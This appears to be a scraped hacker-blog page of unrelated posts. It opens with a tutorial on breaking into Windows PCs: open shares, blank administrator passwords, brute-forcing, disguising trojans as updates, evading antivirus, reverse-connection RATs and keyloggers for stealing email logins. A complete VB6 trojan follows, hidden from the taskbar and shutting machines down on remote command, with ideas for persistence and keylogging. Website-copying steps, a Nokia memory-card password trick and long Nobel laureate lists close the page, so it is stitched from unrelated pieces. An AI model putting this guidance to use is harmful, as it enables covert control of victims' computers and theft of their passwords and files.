Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename". Example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.

Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.

Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.

Using a Trojan / RAT

Trojans is one of the first things you must learn when you want to hack. A trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords, files or just have some fun.

Every trojan works on a diffirent port, like Sub7, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now ofcourse the trojan can be set with a password, its up to you to crack it then. Now remember that most trojans are picked up by Anti Virus software. You need a new released trojan which AV does not pick up.

The trojan most people know is Sub7 . Before you can start using the trojan, you first need a host to infected with a trojan. A host can be infected in a alot of ways. You can send the host the trojan server file, and tell them it's an game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is usefull like : WindowsXP_update.exe. You can email them this file or put it on a downloads area on a web page, use your imagination. When sending a trojan through email, remember to ZIP or RAR the file, most email hosts do not allow you to send .exe files.

If you cannot get hold of a undetecable trojan, you can use a program like Pestil to make the trojan undetectable. I have tested Pestil with Biforst and it was not detected by NOD or AVG anti virus packages.

You can also bind the trojan file with another file, any executable file the trojan can be binded to. Always remember to rename the file, change the program icon and the put a password on the server file. Bind the file with another file and set the file to automatically delete itself after executed, or set it to give an system error.

When you infect a host or find a infected host, it's time to connect. Easy way to find trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will search for trojan infected hosts. When you found an infected host, download the trojan client from my Trojans page.. Connect with the trojan to the host IP, to the certain port the trojan works on and you are ready to take control. Each trojan uses a diffident port. Here is a list of ports which a certain trojan works on.

With most trojans, you will be able to log keystrokes on a PC, even get logged into a file, and when the host is online it will email the keystrokes to an specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you where sitting in front of the PC itself.

Important thing to remember. A trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the trojan! Use the trojans configuration file to make changes to the "server.exe" file and then send the file to a victim.

There is also trojans which has the option to do a reverse connection. Very usefull if the person sits behind a router or firewall. After your infected the victims PC, the trojan will automaticly connects to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the trojan ports in your routers configuration if you are doing a reverse connection.

Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, usefull when the host is behind a router.

Most of us do not have a static IP address, I recomend using a service like no-ip which gives you a name like hacker.no-ip.org which can be pinged from anywhere on the internet and it will give your current IP address. Set your reverse connection trojans to connect to this name.

Securing your Windows PC

Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Go download all the latest versions of applications you use like FTP server or proxy or so, old versions of programs is insecure and you could be hacked that way.. Also try Autopatcher to update your Windows.

Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.

Stop any services you don't use, but be careful not to stop something that u use ( RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTERY services.

Delete the admin shares, share it as something else and then stop sharing it. Then when you reboot it will not share it automatically again. With these admin shares domain admin's and hackers can access your PC. Make sure to put a complex password on all your accounts.

Make your hard drive NTFS - it is the file system you format your harddrive with. Put a password on your BIOS and make sure you change the boot order to boot first with the hard drive, so someone cannot boot up with a CD, delete your SAM file, or crack its password and gain administrator access to your PC..

Make sure the built in firewall is enabled. Check in control panel for Windows firewall. This firewall may be the cause that some of your hacking applications and tools will stop working, so if you have a problem with an application make sure to add this program to your windows firewall exceptions.

Install some kind of anti virus program, Norton Anti Virus works good, but remember that alot of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running those tools.

Also install a Spyware removal tools like Spyware Doctor

Spyware is iritating software which is installed onto your PC through files you download from the net or webpages you open which has mallicious code in it. It slows down your PC and might send your information to the spyware creator.

Frequently asked questions

How do I hack? - There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot.

What do I need to be able to hack? - Firstly you need to understand how your computers operating system works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack.

What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in: "cmd"

What can I do in cmd? - You can can do various things with it like run exploits or do a ping request.

Why does some of the hacking tools I download just close itself when I open them? - Lot's of hacking tools are DOS based and has to be run through CMD. If you double click on the program it will open a DOS box and automaticly close the box. From CMD you can navigate to the directory which your hacking tool is stored in and run it from there. Other hacking tools are GUI ( graphical user interface ) based and it will open like a normal Windows based program.

What is a IP address? - Every computer connected to the Internet or some network has a IP address. Goto START, RUN and type in "cmd" then type in "ipconfig" it will show you your IP adress or adresses. It will look something like this : 81.35.99.84. IP = internet protocol.

How do I find someone's IP adress? - Look further down in this tutorial and use IPSTEALER

What can I do with a IP? - Well you need someone's IP before you can hack, portscan or DOS them.

What is IP ping ? - It's a command you can use to check if someone's IP address is online, to check it they connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this :

Pinging 192.168.0.21 with 32 bytes of data:

Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

That means you can succesfully PING IP 192.168.0.21 which means the IP is online. If you get a message "request timed out" it means the IP is not online.

Bytes=32 is the ammount of data which was sent to the host.

Time<1ms is the time the host took to reply.

Now remember that even though you cannot ping a IP, it does not mean the host is not online, ping requests might just be blocked.

Why can't I ping a certain IP? - Either the IP is not online/ in use or the person your trying to ping is running a firewall which blocks ping requests or maybe your firewall is blocking outgoing ping requests

What is 127.0.0.1 IP? - It is your PC's local loopback IP address.

Why do I have two IP addresses when I do a ipconfig? - Well if your on a local LAN (Local area network) you will have a IP like 192.168.0.1. If your also connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP which you use to comunicate with your local internet network (lan) and 80.87.34.56 is your internet IP.

What is a static and dynamic IP address? - Static means permanent set IP address - like a website will have a static IP address, it never changes. Dynamic means temporary IP address - dailing up to the Internet with a modem or most ADSL connections has dynamic IP's. Everytime you logon to the Internet your ISP ( Internet Service Provider ) will issue you a new IP address.

I have sent someone a trojan but I cannot connect to their PC? - Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router.

What do I do when someone is behind a router and I want to control their PC with a trojan? - You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember when someone is behind a router and your using IPstealer to get hold of their IP address, you are actually getting their routers IP, not their actual PC's IP. The router will have the persons internet IP (WAN IP) and their PC will have a difirent IP - their LAN IP.

How do I check if my own PC is infected with a trojan? - Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.

What is a router? - A device which is used to route data on a network. a Router decides where certain traffic should be sent to.

What is a firewall? - Its a software or hardware device which can block or permit certain ports or IP's or certain kinds of data.

What is a port and what can I do with it? - Every program running on your PC which has some network function uses a specific port to send an receive data though. If you do a port scan you will see which ports are open on the host you scanned. Port 80 is normally a web server. Port 21 a FTP server ect ect.. Trojans also uses ports. Check this list of trojan ports, if you find an open port in this list, the host might be infected with a trojan, download the trojan and try connecting to the port.

How do I do a port scan? - You need a program like superscan to do a portscan. Then all you do is add the ip you want to scan.

Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you which programs or services are running on the PC.

Common ports:

Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110

What is a exploit? - It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there.

How do I use a exploit? - You first need to compile the exploit with a program like Bloodshed C++ compiler. Then you can start the exploit through command prompt and see if the system your trying to exploit is vulnerable to that specific exploit. Scroll down for more information about exploits.

What is a exploit POC? - POC stands for proof of concept and it the proof that a exploit works.

What is a DOS attack? - It is when too much data is being sent to a host and it cannot handle all the data and disconnects from the Internet.

How do I see what connections is currently made to my PC? - In cmd type in "netstat" - it will show you IP addresses of connections to your PC and what port it is using. Also you can use Currports which has a GUI to show current connections and it has option to close the connection on a certain port.

What is a MAC address? - Its a hard coded number, almost like a name which is embedded into a network card. It identifies the manufacturer of the card and a unique number for the card. No two network cards in the world has the same MAC address.

How do I find out my own or someone else's MAC address? -

Your own MAC = Goto cmd and type in "ipconfig /all"

MAC address looks something like this : 00-13-20-A3-0B-4C

Someone else's MAC address you need their IP address and then goto cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user.

What is a Windows Registry and how do I access it? - Its where Windows stores most of the configurations of your operating system and most programs installed. You might used it to make a trojan server file you uploaded to the PC run automaticly when Windows starts up. To access the registry go START, RUN and type in "regedit"

Carefull what you change in the registry, it might screw up you PC.. First make a backup of the registry.

How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC download section on Windows Hacker. Remember not all webservers run IIS!

What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most webservers run on port 80.

How do I check if a website is running on IIS? - Telnet to the website URL through CMD - "telnet www.siteyouwanttocheck.com 80"

What is telnet? - Program which can be used to connect to remote computers or routers and to run commands by simply typing them in its window.

How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then someone discovers a way to get into those email servers, but the service provider fixes the security hole so fast, there is no straight answer for that. Best way is to install a keylogger on the victims PC and get their login details. Otherwise download THIS program which you can use to brute force a hotmail account.

How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the POP3 password.

What is a keylogger? - It is a program you install on someone's PC which captures every key that is pressed on their keyboard which is emailed to you or stored into a file.

How do I get the administrator account password while logged in to the PC? - Locally run a program like Adminhack for local administrator account cracking. If you need to do it remotely run a program like Venom or Starbrute.

What is a SAM file? - SAM file is the file which stores all the user accounts and their password hashes like the Administrator account. SAM file is stored in "C:\WINDOWS\system32\config" but it is locked and inaccessable while you are busy using Windows - meaning you can't copy it while your in Windows. You need to boot up with another operating system like NTFSDOS or Linux with NTFS support. When you copied the SAM file you can crack the passwords stored in the SAM file with a program like LC5. With Pwdump6 it is possible to get access to the SAM file while logged into windows. It can also connect to a remote PC and grab the password hashes from the SAM file. Administrator account is needed. Ophcrack live CD uses rainbow tables to crack user account password, and it boots from a CD.

How do I reset a administrator or some other account password on Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor which you can use to create a bootup disk or CD and then boot up the PC and then you can reset the password. Just remember that this program will not show you the password, you can only change the password.

How do I crack a administrator password? - If you need to crack a administrator password you will need to copy the SAM file to another machine and crack it. Download this NTXP-Cracker program which has included everything you need to boot up the PC, copy the SAM file and crack the SAM file on another machine.

How do I find out what operating system does my target run? - Download Detect and use it against your targets IP address.

Result:

C:\>detect.exe 127.0.0.1
[*]------------------------------[*]
[*] XP/2K OS Detector [*]
[*] by: illwill & phr0stic [*]
[*]------------------------------[*]

[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
[+] Bytes Sent: 222
[?] The box seems to be Windows XP

write a simple trojan in vb6



Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination

Download complete Website and save it on PC

When you discover an interesting website and want to copy a complete website to view it locally without internet connection. If in hurry, you can backup entire website on USB drive and view it afterward. Can be useful even if you want to save thousands of images from a webpage in one click.

HTTrack is a tool to save all the webpages from a specified website. The website downloaded when viewed offline looks exactly as it appears online. An exact mirror of the website is downloaded on your HardDisk with all the styles, background images and alignments keeping intact. The links pointing out of the page are also taken into consideration means those pages are also downloaded. For example: You have to download all the MP3 songs, Flash, videos or only some of them using Filters from a website all at once then WinHTTrack is a feasible option.

The sites downloaded can be used in your regular browser and there are no waiting times to load another page as all the pages are already stored offline in your Local Disk. Moreover, no active Internet connection required to access it. Personally, I used it to show  research pages of my Project to the concerned professor where internet connectivity was poor.

How to download complete website?

Enter Project name and Category (It can be anything according to the site you are downloading). Next the Base Path where the site will be downloaded.


More than one URL can be entered to be downloaded. Specify them in the box. You can specify filters to download specific extension of files like MP3, JPG or PNG from Set Options buttons.



Then Press Finish to start copying. You can prefer to shutdown PC after downloading is completed  as it may take few minutes depending upon the size of files hosted on site.


Now, to view the downloaded website go to the output folder and click on index.html file (general name) or open the HTTrack Website copier program and click Browse Sites from File menu.

Click Here to Download HTTrack


Password for your Nokia Application

Download Active Lock:
Default Password: 12345

I have tested this application on my Nokia N70 mobile and it is working fine and I hope this application will work will for you.

Reset Your Mobile Memory Card Password 2 minutes

We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.



In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)



Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

join scienceHack channel

Economic Science

2010
Peter A. Diamond, Dale T. Mortensen, Christopher A. Pissarides
2009
Elinor Ostrom, Oliver E. Williamson
2008
Paul Krugman
2007
Leonid Hurwicz, Eric S. Maskin, Roger B. Myerson
2006
Edmund S. Phelps
2005
Robert J. Aumann, Thomas C. Schelling
2004
Finn E. Kydland, Edward C. Prescott
2003
Robert F. Engle III, Clive W.J. Granger
2002
Daniel Kahneman, Vernon L. Smith
2001
George A. Akerlof, A. Michael Spence, Joseph E. Stiglitz
2000
James J. Heckman, Daniel L. McFadden
1999
Robert A. Mundell
1998
Amartya Sen
1997
Robert C. Merton, Myron S. Scholes
1996
James A. Mirrlees, William Vickrey
1995
Robert E. Lucas Jr.
1994
John C. Harsanyi, John F. Nash Jr., Reinhard Selten
1993
Robert W. Fogel, Douglass C. North
1992
Gary S. Becker
1991
Ronald H. Coase
1990
Harry M. Markowitz, Merton H. Miller, William F. Sharpe
1989
Trygve Haavelmo
1988
Maurice Allais
1987
Robert M. Solow
1986
James M. Buchanan Jr.
1985
Franco Modigliani
1984
Richard Stone
1983
Gerard Debreu
1982
George J. Stigler
1981
James Tobin
1980
Lawrence R. Klein
1979
Theodore W. Schultz, Sir Arthur Lewis
1978
Herbert A. Simon
1977
Bertil Ohlin, James E. Meade
1976
Milton Friedman
1975
Leonid Vitaliyevich Kantorovich, Tjalling C. Koopmans
1974
Gunnar Myrdal, Friedrich August von Hayek
1973
Wassily Leontief
1972
John R. Hicks, Kenneth J. Arrow
1971
Simon Kuznets
1970
Paul A. Samuelson
1969
Ragnar Frisch, Jan Tinbergen

Physiology or Medicine

2010
Robert G. Edwards
2009
Elizabeth H. Blackburn, Carol W. Greider, Jack W. Szostak
2008
Harald zur Hausen, Françoise Barré-Sinoussi, Luc Montagnier
2007
Mario R. Capecchi, Sir Martin J. Evans, Oliver Smithies
2006
Andrew Z. Fire, Craig C. Mello
2005
Barry J. Marshall, J. Robin Warren
2004
Richard Axel, Linda B. Buck
2003
Paul C. Lauterbur, Sir Peter Mansfield
2002
Sydney Brenner, H. Robert Horvitz, John E. Sulston
2001
Leland H. Hartwell, Tim Hunt, Sir Paul M. Nurse
2000
Arvid Carlsson, Paul Greengard, Eric R. Kandel
1999
Günter Blobel
1998
Robert F. Furchgott, Louis J. Ignarro, Ferid Murad
1997
Stanley B. Prusiner
1996
Peter C. Doherty, Rolf M. Zinkernagel
1995
Edward B. Lewis, Christiane Nüsslein-Volhard, Eric F. Wieschaus
1994
Alfred G. Gilman, Martin Rodbell
1993
Richard J. Roberts, Phillip A. Sharp
1992
Edmond H. Fischer, Edwin G. Krebs
1991
Erwin Neher, Bert Sakmann
1990
Joseph E. Murray, E. Donnall Thomas
1989
J. Michael Bishop, Harold E. Varmus
1988
Sir James W. Black, Gertrude B. Elion, George H. Hitchings
1987
Susumu Tonegawa
1986
Stanley Cohen, Rita Levi-Montalcini
1985
Michael S. Brown, Joseph L. Goldstein
1984
Niels K. Jerne, Georges J.F. Köhler, César Milstein
1983
Barbara McClintock
1982
Sune K. Bergström, Bengt I. Samuelsson, John R. Vane
1981
Roger W. Sperry, David H. Hubel, Torsten N. Wiesel
1980
Baruj Benacerraf, Jean Dausset, George D. Snell
1979
Allan M. Cormack, Godfrey N. Hounsfield
1978
Werner Arber, Daniel Nathans, Hamilton O. Smith
1977
Roger Guillemin, Andrew V. Schally, Rosalyn Yalow
1976
Baruch S. Blumberg, D. Carleton Gajdusek
1975
David Baltimore, Renato Dulbecco, Howard Martin Temin
1974
Albert Claude, Christian de Duve, George E. Palade
1973
Karl von Frisch, Konrad Lorenz, Nikolaas Tinbergen
1972
Gerald M. Edelman, Rodney R. Porter
1971
Earl W. Sutherland, Jr.
1970
Sir Bernard Katz, Ulf von Euler, Julius Axelrod
1969
Max Delbrück, Alfred D. Hershey, Salvador E. Luria
1968
Robert W. Holley, Har Gobind Khorana, Marshall W. Nirenberg
1967
Ragnar Granit, Haldan Keffer Hartline, George Wald
1966
Peyton Rous, Charles Brenton Huggins
1965
François Jacob, André Lwoff, Jacques Monod
1964
Konrad Bloch, Feodor Lynen
1963
Sir John Carew Eccles, Alan Lloyd Hodgkin, Andrew Fielding Huxley
1962
Francis Harry Compton Crick, James Dewey Watson, Maurice Hugh Frederick Wilkins
1961
Georg von Békésy
1960
Sir Frank Macfarlane Burnet, Peter Brian Medawar
1959
Severo Ochoa, Arthur Kornberg
1958
George Wells Beadle, Edward Lawrie Tatum, Joshua Lederberg
1957
Daniel Bovet
1956
André Frédéric Cournand, Werner Forssmann, Dickinson W. Richards
1955
Axel Hugo Theodor Theorell
1954
John Franklin Enders, Thomas Huckle Weller, Frederick Chapman Robbins
1953
Hans Adolf Krebs, Fritz Albert Lipmann
1952
Selman Abraham Waksman
1951
Max Theiler
1950
Edward Calvin Kendall, Tadeus Reichstein, Philip Showalter Hench
1949
Walter Rudolf Hess, Antonio Caetano de Abreu Freire Egas Moniz
1948
Paul Hermann Müller
1947
Carl Ferdinand Cori, Gerty Theresa Cori, née Radnitz, Bernardo Alberto Houssay
1946
Hermann Joseph Muller
1945
Sir Alexander Fleming, Ernst Boris Chain, Sir Howard Walter Florey
1944
Joseph Erlanger, Herbert Spencer Gasser
1943
Henrik Carl Peter Dam, Edward Adelbert Doisy
1942
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1941
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1940
No Nobel Prize was awarded this year. The prize money was with 1/3 allocated to the Main Fund and with 2/3 to the Special Fund of this prize section.
1939
Gerhard Domagk
1938
Corneille Jean François Heymans
1937
Albert von Szent-Györgyi Nagyrápolt
1936
Sir Henry Hallett Dale, Otto Loewi
1935
Hans Spemann
1934
George Hoyt Whipple, George Richards Minot, William Parry Murphy
1933
Thomas Hunt Morgan
1932
Sir Charles Scott Sherrington, Edgar Douglas Adrian
1931
Otto Heinrich Warburg
1930
Karl Landsteiner
1929
Christiaan Eijkman, Sir Frederick Gowland Hopkins
1928
Charles Jules Henri Nicolle
1927
Julius Wagner-Jauregg
1926
Johannes Andreas Grib Fibiger
1925
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1924
Willem Einthoven
1923
Frederick Grant Banting, John James Rickard Macleod
1922
Archibald Vivian Hill, Otto Fritz Meyerhof
1921
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1920
Schack August Steenberg Krogh
1919
Jules Bordet
1918
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1917
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1916
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1915
No Nobel Prize was awarded this year. The prize money was allocated to the Special Fund of this prize section.
1914
Robert Bárány
1913
Charles Robert Richet
1912
Alexis Carrel
1911
Allvar Gullstrand
1910
Albrecht Kossel
1909
Emil Theodor Kocher
1908
Ilya Ilyich Mechnikov, Paul Ehrlich
1907
Charles Louis Alphonse Laveran
1906
Camillo Golgi, Santiago Ramón y Cajal
1905
Robert Koch
1904
Ivan Petrovich Pavlov
1903
Niels Ryberg Finsen
1902
Ronald Ross
1901
Emil Adolf von Behring